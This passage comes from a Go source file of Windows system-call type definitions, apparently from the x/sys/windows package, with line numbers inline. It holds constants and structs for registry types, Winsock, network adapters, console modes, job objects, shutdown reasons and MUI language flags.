REG_BINARY 1172 | REG_DWORD_LITTLE_ENDIAN 1173 | REG_DWORD_BIG_ENDIAN 1174 | REG_LINK 1175 | REG_MULTI_SZ 1176 | REG_RESOURCE_LIST 1177 | REG_FULL_RESOURCE_DESCRIPTOR 1178 | REG_RESOURCE_REQUIREMENTS_LIST 1179 | REG_QWORD_LITTLE_ENDIAN 1180 | REG_DWORD = REG_DWORD_LITTLE_ENDIAN 1181 | REG_QWORD = REG_QWORD_LITTLE_ENDIAN 1182 | ) 1183 | 1184 | const ( 1185 | EVENT_MODIFY_STATE = 0x0002 1186 | EVENT_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3 1187 | 1188 | MUTANT_QUERY_STATE = 0x0001 1189 | MUTANT_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | MUTANT_QUERY_STATE 1190 | 1191 | SEMAPHORE_MODIFY_STATE = 0x0002 1192 | SEMAPHORE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0x3 1193 | 1194 | TIMER_QUERY_STATE = 0x0001 1195 | TIMER_MODIFY_STATE = 0x0002 1196 | TIMER_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | TIMER_QUERY_STATE | TIMER_MODIFY_STATE 1197 | 1198 | MUTEX_MODIFY_STATE = MUTANT_QUERY_STATE 1199 | MUTEX_ALL_ACCESS = MUTANT_ALL_ACCESS 1200 | 1201 | CREATE_EVENT_MANUAL_RESET = 0x1 1202 | CREATE_EVENT_INITIAL_SET = 0x2 1203 | CREATE_MUTEX_INITIAL_OWNER = 0x1 1204 | ) 1205 | 1206 | type AddrinfoW struct { 1207 | Flags int32 1208 | Family int32 1209 | Socktype int32 1210 | Protocol int32 1211 | Addrlen uintptr 1212 | Canonname *uint16 1213 | Addr uintptr 1214 | Next *AddrinfoW 1215 | } 1216 | 1217 | const ( 1218 | AI_PASSIVE = 1 1219 | AI_CANONNAME = 2 1220 | AI_NUMERICHOST = 4 1221 | ) 1222 | 1223 | type GUID struct { 1224 | Data1 uint32 1225 | Data2 uint16 1226 | Data3 uint16 1227 | Data4 [8]byte 1228 | } 1229 | 1230 | var WSAID_CONNECTEX = GUID{ 1231 | 0x25a207b9, 1232 | 0xddf3, 1233 | 0x4660, 1234 | [8]byte{0x8e, 0xe9, 0x76, 0xe5, 0x8c, 0x74, 0x06, 0x3e}, 1235 | } 1236 | 1237 | var WSAID_WSASENDMSG = GUID{ 1238 | 0xa441e712, 1239 | 0x754f, 1240 | 0x43ca, 1241 | [8]byte{0x84, 0xa7, 0x0d, 0xee, 0x44, 0xcf, 0x60, 0x6d}, 1242 | } 1243 | 1244 | var WSAID_WSARECVMSG = GUID{ 1245 | 0xf689d7c8, 1246 | 0x6f1f, 1247 | 0x436b, 1248 | [8]byte{0x8a, 0x53, 0xe5, 0x4f, 0xe3, 0x51, 0xc3, 0x22}, 1249 | } 1250 | 1251 | const ( 1252 | FILE_SKIP_COMPLETION_PORT_ON_SUCCESS = 1 1253 | FILE_SKIP_SET_EVENT_ON_HANDLE = 2 1254 | ) 1255 | 1256 | const ( 1257 | WSAPROTOCOL_LEN = 255 1258 | MAX_PROTOCOL_CHAIN = 7 1259 | BASE_PROTOCOL = 1 1260 | LAYERED_PROTOCOL = 0 1261 | 1262 | XP1_CONNECTIONLESS = 0x00000001 1263 | XP1_GUARANTEED_DELIVERY = 0x00000002 1264 | XP1_GUARANTEED_ORDER = 0x00000004 1265 | XP1_MESSAGE_ORIENTED = 0x00000008 1266 | XP1_PSEUDO_STREAM = 0x00000010 1267 | XP1_GRACEFUL_CLOSE = 0x00000020 1268 | XP1_EXPEDITED_DATA = 0x00000040 1269 | XP1_CONNECT_DATA = 0x00000080 1270 | XP1_DISCONNECT_DATA = 0x00000100 1271 | XP1_SUPPORT_BROADCAST = 0x00000200 1272 | XP1_SUPPORT_MULTIPOINT = 0x00000400 1273 | XP1_MULTIPOINT_CONTROL_PLANE = 0x00000800 1274 | XP1_MULTIPOINT_DATA_PLANE = 0x00001000 1275 | XP1_QOS_SUPPORTED = 0x00002000 1276 | XP1_UNI_SEND = 0x00008000 1277 | XP1_UNI_RECV = 0x00010000 1278 | XP1_IFS_HANDLES = 0x00020000 1279 | XP1_PARTIAL_MESSAGE = 0x00040000 1280 | XP1_SAN_SUPPORT_SDP = 0x00080000 1281 | 1282 | PFL_MULTIPLE_PROTO_ENTRIES = 0x00000001 1283 | PFL_RECOMMENDED_PROTO_ENTRY = 0x00000002 1284 | PFL_HIDDEN = 0x00000004 1285 | PFL_MATCHES_PROTOCOL_ZERO = 0x00000008 1286 | PFL_NETWORKDIRECT_PROVIDER = 0x00000010 1287 | ) 1288 | 1289 | type WSAProtocolInfo struct { 1290 | ServiceFlags1 uint32 1291 | ServiceFlags2 uint32 1292 | ServiceFlags3 uint32 1293 | ServiceFlags4 uint32 1294 | ProviderFlags uint32 1295 | ProviderId GUID 1296 | CatalogEntryId uint32 1297 | ProtocolChain WSAProtocolChain 1298 | Version int32 1299 | AddressFamily int32 1300 | MaxSockAddr int32 1301 | MinSockAddr int32 1302 | SocketType int32 1303 | Protocol int32 1304 | ProtocolMaxOffset int32 1305 | NetworkByteOrder int32 1306 | SecurityScheme int32 1307 | MessageSize uint32 1308 | ProviderReserved uint32 1309 | ProtocolName [WSAPROTOCOL_LEN + 1]uint16 1310 | } 1311 | 1312 | type WSAProtocolChain struct { 1313 | ChainLen int32 1314 | ChainEntries [MAX_PROTOCOL_CHAIN]uint32 1315 | } 1316 | 1317 | type TCPKeepalive struct { 1318 | OnOff uint32 1319 | Time uint32 1320 | Interval uint32 1321 | } 1322 | 1323 | type symbolicLinkReparseBuffer struct { 1324 | SubstituteNameOffset uint16 1325 | SubstituteNameLength uint16 1326 | PrintNameOffset uint16 1327 | PrintNameLength uint16 1328 | Flags uint32 1329 | PathBuffer [1]uint16 1330 | } 1331 | 1332 | type mountPointReparseBuffer struct { 1333 | SubstituteNameOffset uint16 1334 | SubstituteNameLength uint16 1335 | PrintNameOffset uint16 1336 | PrintNameLength uint16 1337 | PathBuffer [1]uint16 1338 | } 1339 | 1340 | type reparseDataBuffer struct { 1341 | ReparseTag uint32 1342 | ReparseDataLength uint16 1343 | Reserved uint16 1344 | 1345 | // GenericReparseBuffer 1346 | reparseBuffer byte 1347 | } 1348 | 1349 | const ( 1350 | FSCTL_GET_REPARSE_POINT = 0x900A8 1351 | MAXIMUM_REPARSE_DATA_BUFFER_SIZE = 16 * 1024 1352 | IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003 1353 | IO_REPARSE_TAG_SYMLINK = 0xA000000C 1354 | SYMBOLIC_LINK_FLAG_DIRECTORY = 0x1 1355 | ) 1356 | 1357 | const ( 1358 | ComputerNameNetBIOS = 0 1359 | ComputerNameDnsHostname = 1 1360 | ComputerNameDnsDomain = 2 1361 | ComputerNameDnsFullyQualified = 3 1362 | ComputerNamePhysicalNetBIOS = 4 1363 | ComputerNamePhysicalDnsHostname = 5 1364 | ComputerNamePhysicalDnsDomain = 6 1365 | ComputerNamePhysicalDnsFullyQualified = 7 1366 | ComputerNameMax = 8 1367 | ) 1368 | 1369 | // For MessageBox() 1370 | const ( 1371 | MB_OK = 0x00000000 1372 | MB_OKCANCEL = 0x00000001 1373 | MB_ABORTRETRYIGNORE = 0x00000002 1374 | MB_YESNOCANCEL = 0x00000003 1375 | MB_YESNO = 0x00000004 1376 | MB_RETRYCANCEL = 0x00000005 1377 | MB_CANCELTRYCONTINUE = 0x00000006 1378 | MB_ICONHAND = 0x00000010 1379 | MB_ICONQUESTION = 0x00000020 1380 | MB_ICONEXCLAMATION = 0x00000030 1381 | MB_ICONASTERISK = 0x00000040 1382 | MB_USERICON = 0x00000080 1383 | MB_ICONWARNING = MB_ICONEXCLAMATION 1384 | MB_ICONERROR = MB_ICONHAND 1385 | MB_ICONINFORMATION = MB_ICONASTERISK 1386 | MB_ICONSTOP = MB_ICONHAND 1387 | MB_DEFBUTTON1 = 0x00000000 1388 | MB_DEFBUTTON2 = 0x00000100 1389 | MB_DEFBUTTON3 = 0x00000200 1390 | MB_DEFBUTTON4 = 0x00000300 1391 | MB_APPLMODAL = 0x00000000 1392 | MB_SYSTEMMODAL = 0x00001000 1393 | MB_TASKMODAL = 0x00002000 1394 | MB_HELP = 0x00004000 1395 | MB_NOFOCUS = 0x00008000 1396 | MB_SETFOREGROUND = 0x00010000 1397 | MB_DEFAULT_DESKTOP_ONLY = 0x00020000 1398 | MB_TOPMOST = 0x00040000 1399 | MB_RIGHT = 0x00080000 1400 | MB_RTLREADING = 0x00100000 1401 | MB_SERVICE_NOTIFICATION = 0x00200000 1402 | ) 1403 | 1404 | const ( 1405 | MOVEFILE_REPLACE_EXISTING = 0x1 1406 | MOVEFILE_COPY_ALLOWED = 0x2 1407 | MOVEFILE_DELAY_UNTIL_REBOOT = 0x4 1408 | MOVEFILE_WRITE_THROUGH = 0x8 1409 | MOVEFILE_CREATE_HARDLINK = 0x10 1410 | MOVEFILE_FAIL_IF_NOT_TRACKABLE = 0x20 1411 | ) 1412 | 1413 | const GAA_FLAG_INCLUDE_PREFIX = 0x00000010 1414 | 1415 | const ( 1416 | IF_TYPE_OTHER = 1 1417 | IF_TYPE_ETHERNET_CSMACD = 6 1418 | IF_TYPE_ISO88025_TOKENRING = 9 1419 | IF_TYPE_PPP = 23 1420 | IF_TYPE_SOFTWARE_LOOPBACK = 24 1421 | IF_TYPE_ATM = 37 1422 | IF_TYPE_IEEE80211 = 71 1423 | IF_TYPE_TUNNEL = 131 1424 | IF_TYPE_IEEE1394 = 144 1425 | ) 1426 | 1427 | type SocketAddress struct { 1428 | Sockaddr *syscall.RawSockaddrAny 1429 | SockaddrLength int32 1430 | } 1431 | 1432 | // IP returns an IPv4 or IPv6 address, or nil if the underlying SocketAddress is neither. 1433 | func (addr *SocketAddress) IP() net.IP { 1434 | if uintptr(addr.SockaddrLength) >= unsafe.Sizeof(RawSockaddrInet4{}) && addr.Sockaddr.Addr.Family == AF_INET { 1435 | return (*RawSockaddrInet4)(unsafe.Pointer(addr.Sockaddr)).Addr[:] 1436 | } else if uintptr(addr.SockaddrLength) >= unsafe.Sizeof(RawSockaddrInet6{}) && addr.Sockaddr.Addr.Family == AF_INET6 { 1437 | return (*RawSockaddrInet6)(unsafe.Pointer(addr.Sockaddr)).Addr[:] 1438 | } 1439 | return nil 1440 | } 1441 | 1442 | type IpAdapterUnicastAddress struct { 1443 | Length uint32 1444 | Flags uint32 1445 | Next *IpAdapterUnicastAddress 1446 | Address SocketAddress 1447 | PrefixOrigin int32 1448 | SuffixOrigin int32 1449 | DadState int32 1450 | ValidLifetime uint32 1451 | PreferredLifetime uint32 1452 | LeaseLifetime uint32 1453 | OnLinkPrefixLength uint8 1454 | } 1455 | 1456 | type IpAdapterAnycastAddress struct { 1457 | Length uint32 1458 | Flags uint32 1459 | Next *IpAdapterAnycastAddress 1460 | Address SocketAddress 1461 | } 1462 | 1463 | type IpAdapterMulticastAddress struct { 1464 | Length uint32 1465 | Flags uint32 1466 | Next *IpAdapterMulticastAddress 1467 | Address SocketAddress 1468 | } 1469 | 1470 | type IpAdapterDnsServerAdapter struct { 1471 | Length uint32 1472 | Reserved uint32 1473 | Next *IpAdapterDnsServerAdapter 1474 | Address SocketAddress 1475 | } 1476 | 1477 | type IpAdapterPrefix struct { 1478 | Length uint32 1479 | Flags uint32 1480 | Next *IpAdapterPrefix 1481 | Address SocketAddress 1482 | PrefixLength uint32 1483 | } 1484 | 1485 | type IpAdapterAddresses struct { 1486 | Length uint32 1487 | IfIndex uint32 1488 | Next *IpAdapterAddresses 1489 | AdapterName *byte 1490 | FirstUnicastAddress *IpAdapterUnicastAddress 1491 | FirstAnycastAddress *IpAdapterAnycastAddress 1492 | FirstMulticastAddress *IpAdapterMulticastAddress 1493 | FirstDnsServerAddress *IpAdapterDnsServerAdapter 1494 | DnsSuffix *uint16 1495 | Description *uint16 1496 | FriendlyName *uint16 1497 | PhysicalAddress [syscall.MAX_ADAPTER_ADDRESS_LENGTH]byte 1498 | PhysicalAddressLength uint32 1499 | Flags uint32 1500 | Mtu uint32 1501 | IfType uint32 1502 | OperStatus uint32 1503 | Ipv6IfIndex uint32 1504 | ZoneIndices [16]uint32 1505 | FirstPrefix *IpAdapterPrefix 1506 | /* more fields might be present here. */ 1507 | } 1508 | 1509 | const ( 1510 | IfOperStatusUp = 1 1511 | IfOperStatusDown = 2 1512 | IfOperStatusTesting = 3 1513 | IfOperStatusUnknown = 4 1514 | IfOperStatusDormant = 5 1515 | IfOperStatusNotPresent = 6 1516 | IfOperStatusLowerLayerDown = 7 1517 | ) 1518 | 1519 | // Console related constants used for the mode parameter to SetConsoleMode. See 1520 | // https://docs.microsoft.com/en-us/windows/console/setconsolemode for details. 1521 | 1522 | const ( 1523 | ENABLE_PROCESSED_INPUT = 0x1 1524 | ENABLE_LINE_INPUT = 0x2 1525 | ENABLE_ECHO_INPUT = 0x4 1526 | ENABLE_WINDOW_INPUT = 0x8 1527 | ENABLE_MOUSE_INPUT = 0x10 1528 | ENABLE_INSERT_MODE = 0x20 1529 | ENABLE_QUICK_EDIT_MODE = 0x40 1530 | ENABLE_EXTENDED_FLAGS = 0x80 1531 | ENABLE_AUTO_POSITION = 0x100 1532 | ENABLE_VIRTUAL_TERMINAL_INPUT = 0x200 1533 | 1534 | ENABLE_PROCESSED_OUTPUT = 0x1 1535 | ENABLE_WRAP_AT_EOL_OUTPUT = 0x2 1536 | ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x4 1537 | DISABLE_NEWLINE_AUTO_RETURN = 0x8 1538 | ENABLE_LVB_GRID_WORLDWIDE = 0x10 1539 | ) 1540 | 1541 | type Coord struct { 1542 | X int16 1543 | Y int16 1544 | } 1545 | 1546 | type SmallRect struct { 1547 | Left int16 1548 | Top int16 1549 | Right int16 1550 | Bottom int16 1551 | } 1552 | 1553 | // Used with GetConsoleScreenBuffer to retrieve information about a console 1554 | // screen buffer. See 1555 | // https://docs.microsoft.com/en-us/windows/console/console-screen-buffer-info-str 1556 | // for details. 1557 | 1558 | type ConsoleScreenBufferInfo struct { 1559 | Size Coord 1560 | CursorPosition Coord 1561 | Attributes uint16 1562 | Window SmallRect 1563 | MaximumWindowSize Coord 1564 | } 1565 | 1566 | const UNIX_PATH_MAX = 108 // defined in afunix.h 1567 | 1568 | const ( 1569 | // flags for JOBOBJECT_BASIC_LIMIT_INFORMATION.LimitFlags 1570 | JOB_OBJECT_LIMIT_ACTIVE_PROCESS = 0x00000008 1571 | JOB_OBJECT_LIMIT_AFFINITY = 0x00000010 1572 | JOB_OBJECT_LIMIT_BREAKAWAY_OK = 0x00000800 1573 | JOB_OBJECT_LIMIT_DIE_ON_UNHANDLED_EXCEPTION = 0x00000400 1574 | JOB_OBJECT_LIMIT_JOB_MEMORY = 0x00000200 1575 | JOB_OBJECT_LIMIT_JOB_TIME = 0x00000004 1576 | JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE = 0x00002000 1577 | JOB_OBJECT_LIMIT_PRESERVE_JOB_TIME = 0x00000040 1578 | JOB_OBJECT_LIMIT_PRIORITY_CLASS = 0x00000020 1579 | JOB_OBJECT_LIMIT_PROCESS_MEMORY = 0x00000100 1580 | JOB_OBJECT_LIMIT_PROCESS_TIME = 0x00000002 1581 | JOB_OBJECT_LIMIT_SCHEDULING_CLASS = 0x00000080 1582 | JOB_OBJECT_LIMIT_SILENT_BREAKAWAY_OK = 0x00001000 1583 | JOB_OBJECT_LIMIT_SUBSET_AFFINITY = 0x00004000 1584 | JOB_OBJECT_LIMIT_WORKINGSET = 0x00000001 1585 | ) 1586 | 1587 | type JOBOBJECT_BASIC_LIMIT_INFORMATION struct { 1588 | PerProcessUserTimeLimit int64 1589 | PerJobUserTimeLimit int64 1590 | LimitFlags uint32 1591 | MinimumWorkingSetSize uintptr 1592 | MaximumWorkingSetSize uintptr 1593 | ActiveProcessLimit uint32 1594 | Affinity uintptr 1595 | PriorityClass uint32 1596 | SchedulingClass uint32 1597 | } 1598 | 1599 | type IO_COUNTERS struct { 1600 | ReadOperationCount uint64 1601 | WriteOperationCount uint64 1602 | OtherOperationCount uint64 1603 | ReadTransferCount uint64 1604 | WriteTransferCount uint64 1605 | OtherTransferCount uint64 1606 | } 1607 | 1608 | type JOBOBJECT_EXTENDED_LIMIT_INFORMATION struct { 1609 | BasicLimitInformation JOBOBJECT_BASIC_LIMIT_INFORMATION 1610 | IoInfo IO_COUNTERS 1611 | ProcessMemoryLimit uintptr 1612 | JobMemoryLimit uintptr 1613 | PeakProcessMemoryUsed uintptr 1614 | PeakJobMemoryUsed uintptr 1615 | } 1616 | 1617 | const ( 1618 | // UIRestrictionsClass 1619 | JOB_OBJECT_UILIMIT_DESKTOP = 0x00000040 1620 | JOB_OBJECT_UILIMIT_DISPLAYSETTINGS = 0x00000010 1621 | JOB_OBJECT_UILIMIT_EXITWINDOWS = 0x00000080 1622 | JOB_OBJECT_UILIMIT_GLOBALATOMS = 0x00000020 1623 | JOB_OBJECT_UILIMIT_HANDLES = 0x00000001 1624 | JOB_OBJECT_UILIMIT_READCLIPBOARD = 0x00000002 1625 | JOB_OBJECT_UILIMIT_SYSTEMPARAMETERS = 0x00000008 1626 | JOB_OBJECT_UILIMIT_WRITECLIPBOARD = 0x00000004 1627 | ) 1628 | 1629 | type JOBOBJECT_BASIC_UI_RESTRICTIONS struct { 1630 | UIRestrictionsClass uint32 1631 | } 1632 | 1633 | const ( 1634 | // JobObjectInformationClass 1635 | JobObjectAssociateCompletionPortInformation = 7 1636 | JobObjectBasicLimitInformation = 2 1637 | JobObjectBasicUIRestrictions = 4 1638 | JobObjectCpuRateControlInformation = 15 1639 | JobObjectEndOfJobTimeInformation = 6 1640 | JobObjectExtendedLimitInformation = 9 1641 | JobObjectGroupInformation = 11 1642 | JobObjectGroupInformationEx = 14 1643 | JobObjectLimitViolationInformation2 = 35 1644 | JobObjectNetRateControlInformation = 32 1645 | JobObjectNotificationLimitInformation = 12 1646 | JobObjectNotificationLimitInformation2 = 34 1647 | JobObjectSecurityLimitInformation = 5 1648 | ) 1649 | 1650 | const ( 1651 | KF_FLAG_DEFAULT = 0x00000000 1652 | KF_FLAG_FORCE_APP_DATA_REDIRECTION = 0x00080000 1653 | KF_FLAG_RETURN_FILTER_REDIRECTION_TARGET = 0x00040000 1654 | KF_FLAG_FORCE_PACKAGE_REDIRECTION = 0x00020000 1655 | KF_FLAG_NO_PACKAGE_REDIRECTION = 0x00010000 1656 | KF_FLAG_FORCE_APPCONTAINER_REDIRECTION = 0x00020000 1657 | KF_FLAG_NO_APPCONTAINER_REDIRECTION = 0x00010000 1658 | KF_FLAG_CREATE = 0x00008000 1659 | KF_FLAG_DONT_VERIFY = 0x00004000 1660 | KF_FLAG_DONT_UNEXPAND = 0x00002000 1661 | KF_FLAG_NO_ALIAS = 0x00001000 1662 | KF_FLAG_INIT = 0x00000800 1663 | KF_FLAG_DEFAULT_PATH = 0x00000400 1664 | KF_FLAG_NOT_PARENT_RELATIVE = 0x00000200 1665 | KF_FLAG_SIMPLE_IDLIST = 0x00000100 1666 | KF_FLAG_ALIAS_ONLY = 0x80000000 1667 | ) 1668 | 1669 | type OsVersionInfoEx struct { 1670 | osVersionInfoSize uint32 1671 | MajorVersion uint32 1672 | MinorVersion uint32 1673 | BuildNumber uint32 1674 | PlatformId uint32 1675 | CsdVersion [128]uint16 1676 | ServicePackMajor uint16 1677 | ServicePackMinor uint16 1678 | SuiteMask uint16 1679 | ProductType byte 1680 | _ byte 1681 | } 1682 | 1683 | const ( 1684 | EWX_LOGOFF = 0x00000000 1685 | EWX_SHUTDOWN = 0x00000001 1686 | EWX_REBOOT = 0x00000002 1687 | EWX_FORCE = 0x00000004 1688 | EWX_POWEROFF = 0x00000008 1689 | EWX_FORCEIFHUNG = 0x00000010 1690 | EWX_QUICKRESOLVE = 0x00000020 1691 | EWX_RESTARTAPPS = 0x00000040 1692 | EWX_HYBRID_SHUTDOWN = 0x00400000 1693 | EWX_BOOTOPTIONS = 0x01000000 1694 | 1695 | SHTDN_REASON_FLAG_COMMENT_REQUIRED = 0x01000000 1696 | SHTDN_REASON_FLAG_DIRTY_PROBLEM_ID_REQUIRED = 0x02000000 1697 | SHTDN_REASON_FLAG_CLEAN_UI = 0x04000000 1698 | SHTDN_REASON_FLAG_DIRTY_UI = 0x08000000 1699 | SHTDN_REASON_FLAG_USER_DEFINED = 0x40000000 1700 | SHTDN_REASON_FLAG_PLANNED = 0x80000000 1701 | SHTDN_REASON_MAJOR_OTHER = 0x00000000 1702 | SHTDN_REASON_MAJOR_NONE = 0x00000000 1703 | SHTDN_REASON_MAJOR_HARDWARE = 0x00010000 1704 | SHTDN_REASON_MAJOR_OPERATINGSYSTEM = 0x00020000 1705 | SHTDN_REASON_MAJOR_SOFTWARE = 0x00030000 1706 | SHTDN_REASON_MAJOR_APPLICATION = 0x00040000 1707 | SHTDN_REASON_MAJOR_SYSTEM = 0x00050000 1708 | SHTDN_REASON_MAJOR_POWER = 0x00060000 1709 | SHTDN_REASON_MAJOR_LEGACY_API = 0x00070000 1710 | SHTDN_REASON_MINOR_OTHER = 0x00000000 1711 | SHTDN_REASON_MINOR_NONE = 0x000000ff 1712 | SHTDN_REASON_MINOR_MAINTENANCE = 0x00000001 1713 | SHTDN_REASON_MINOR_INSTALLATION = 0x00000002 1714 | SHTDN_REASON_MINOR_UPGRADE = 0x00000003 1715 | SHTDN_REASON_MINOR_RECONFIG = 0x00000004 1716 | SHTDN_REASON_MINOR_HUNG = 0x00000005 1717 | SHTDN_REASON_MINOR_UNSTABLE = 0x00000006 1718 | SHTDN_REASON_MINOR_DISK = 0x00000007 1719 | SHTDN_REASON_MINOR_PROCESSOR = 0x00000008 1720 | SHTDN_REASON_MINOR_NETWORKCARD = 0x00000009 1721 | SHTDN_REASON_MINOR_POWER_SUPPLY = 0x0000000a 1722 | SHTDN_REASON_MINOR_CORDUNPLUGGED = 0x0000000b 1723 | SHTDN_REASON_MINOR_ENVIRONMENT = 0x0000000c 1724 | SHTDN_REASON_MINOR_HARDWARE_DRIVER = 0x0000000d 1725 | SHTDN_REASON_MINOR_OTHERDRIVER = 0x0000000e 1726 | SHTDN_REASON_MINOR_BLUESCREEN = 0x0000000F 1727 | SHTDN_REASON_MINOR_SERVICEPACK = 0x00000010 1728 | SHTDN_REASON_MINOR_HOTFIX = 0x00000011 1729 | SHTDN_REASON_MINOR_SECURITYFIX = 0x00000012 1730 | SHTDN_REASON_MINOR_SECURITY = 0x00000013 1731 | SHTDN_REASON_MINOR_NETWORK_CONNECTIVITY = 0x00000014 1732 | SHTDN_REASON_MINOR_WMI = 0x00000015 1733 | SHTDN_REASON_MINOR_SERVICEPACK_UNINSTALL = 0x00000016 1734 | SHTDN_REASON_MINOR_HOTFIX_UNINSTALL = 0x00000017 1735 | SHTDN_REASON_MINOR_SECURITYFIX_UNINSTALL = 0x00000018 1736 | SHTDN_REASON_MINOR_MMC = 0x00000019 1737 | SHTDN_REASON_MINOR_SYSTEMRESTORE = 0x0000001a 1738 | SHTDN_REASON_MINOR_TERMSRV = 0x00000020 1739 | SHTDN_REASON_MINOR_DC_PROMOTION = 0x00000021 1740 | SHTDN_REASON_MINOR_DC_DEMOTION = 0x00000022 1741 | SHTDN_REASON_UNKNOWN = SHTDN_REASON_MINOR_NONE 1742 | SHTDN_REASON_LEGACY_API = SHTDN_REASON_MAJOR_LEGACY_API | SHTDN_REASON_FLAG_PLANNED 1743 | SHTDN_REASON_VALID_BIT_MASK = 0xc0ffffff 1744 | 1745 | SHUTDOWN_NORETRY = 0x1 1746 | ) 1747 | 1748 | // Flags used for GetModuleHandleEx 1749 | const ( 1750 | GET_MODULE_HANDLE_EX_FLAG_PIN = 1 1751 | GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT = 2 1752 | GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS = 4 1753 | ) 1754 | 1755 | // MUI function flag values 1756 | const ( 1757 | MUI_LANGUAGE_ID = 0x4 1758 | MUI_LANGUAGE_NAME = 0x8 1759 | MUI_MERGE_SYSTEM_FALLBACK = 0x10 1760 | MUI_MERGE_USER_FALLBACK = 0x20 1761 | MUI_UI_FALLBACK = MUI_MERGE_SYSTEM_FALLBACK | MUI_MERGE_USER_FALLBACK 1762 | MUI_THREAD_LANGUAGES = 0x40 1763 | MUI_CONSOLE_FILTER = 0x100 1764 | MUI_COMPLEX_SCRIPT_FILTER = 0x200 1765 | MUI_RESET_FILTERS = 0x001 1766 | MUI_USER_PREFERRED_UI_LANGUAGES = 0x10 1767 | MUI_USE_INSTALLED_LANGUAGES = 0x20 1768 | MUI_USE_SEARCH_ALL_LANGUAGES = 0x40 1769 | MUI_LANG_NEUTRAL_PE_FILE = 0x100 1770 | MUI_NON_LANG_NEUTRAL_FILE = 0x200 1771 | MUI_MACHINE_LANGUAGE_SETTINGS = 0x400 1772 | MUI_FILETYPE_NOT_LANGUAGE_NEUTRAL = 0x001 1773 | MUI_FILETYPE_LANGUAGE_NEUTRAL_MAIN = 0x002 1774 | MUI_FILETYPE_LANGUAGE_NEUTRAL_MUI = 0x004 1775 | MUI_QUERY_TYPE = 0x001 1776 | MUI_QUERY_CHECKSUM = 0x002 1777 | MUI_QUERY_LANGUAGE_NAME = 0x004 1778 | MUI_QUERY_RESOURCE_TYPES = 0x008 1779 | MUI_FILEINFO_VERSION = 0x001 1780 | 1781 | MUI_FULL_LANGUAGE = 0x01 1782 | MUI_PARTIAL_LANGUAGE = 0x02 1783 | MUI_LIP_LANGUAGE = 0x04 1784 | MUI_LANGUAGE_INSTALLED = 0x20 1785 | MUI_LANGUAGE_LICENSED = 0x40 1786 | ) 1787 | --------------------------------------------------------------------------------